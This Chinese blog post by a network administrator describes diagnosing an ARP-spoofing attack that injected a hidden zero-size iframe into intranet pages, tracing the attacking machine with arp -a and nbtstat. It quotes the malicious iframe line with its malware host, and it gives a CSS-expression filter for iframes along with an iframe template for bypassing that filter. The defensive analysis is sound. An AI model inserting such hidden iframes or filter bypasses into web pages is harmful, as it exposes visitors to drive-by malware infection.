iframe注入与arp欺骗的问题

"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"

本来以为这个帧病毒，是“微软鼠标指针漏洞”的原因。篇一上了下写。断判的误，看来我是轻易下结论了，临下班的关机时间，给我带了错误的判断。写下了上一篇。http://birder.blueidea.com/archives/2007/4713.shtml

有强人说过，博客发表时要慎重，想好再发，但是既然发了就不能轻易删了。错误既然犯了，就留下做为警戒。以后发贴时，要验证清楚再按发送。

以下：正修是修正：

因为局域网感染流行病毒，总是比外网慢一拍，等啊等啊，终于等到传说中的"ARP欺骗"，得以一窥其芳容。

连入局域网的用户,不断反映内部网页打不开,在排除其它因素之后,用记事本打开网页,查看源代码。

发现在底部多了一行代码"<iframe src=http://34.baieweee.com/5.html width=0 height=0 frameborder=0></iframe>"以为是WEB服务器中招出了问题，在本地查看其源码，并没有发现异常代码。很是奇怪，和网上说的不一样啊？！

也就是说服务器并没有感染，这就好办了，只是客户机有问题。

中午休息时间，报故障的机器来电话说正常了，又可以打开网页了，可我什么都没动呀，看来是是那台攻击的机器午休了。

到了下午上班时间，果然，故障又出现了，和预想的一样。

直接调出CDM，输入

arp -a

172.16.90.21          00-02-3f-e8-a3-38     dynamic
172.16.90.104         00-02-3f-e8-a3-38     dynamic
172.16.90.251         00-02-b3-13-ef-36     dynamic

看出来没有？因为90.21是我们网关，90.104居然和网关的MAC地址一样，双胞胎啊，是典型的ARP欺骗。

找到源头地址就好办了，接下来用 nbtstat -A 172.16.90.104 查找到机器名，定位到某科室办公用机。

接下来事情，就是通知该机用户，做杀毒，恢复系统处理。

至此，本次的“ARP欺骗”告一段落。

<style type="text/css" media="all" id="tt">
/*<![CDATA[*/
iframe{
v:e­xpression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有　IFRAME　*/
}
#f126{v:e­xpression() !important} //如果要使自己的IFRAME可以执行，在自己的IFRAME里加上ID="f126"；
/*]]>*/
</style>

分析：
前缀:e­xpression(表达式);

　　这个前缀是可以随意更换的，我上面取名为"v"，例如我可以换成：abc123:e­xpression(this.src='about: blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:e­xpression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123)，才能挂到马，哈哈哈！如果把前缀做成动态的，就非常OK了，看你怎么挂！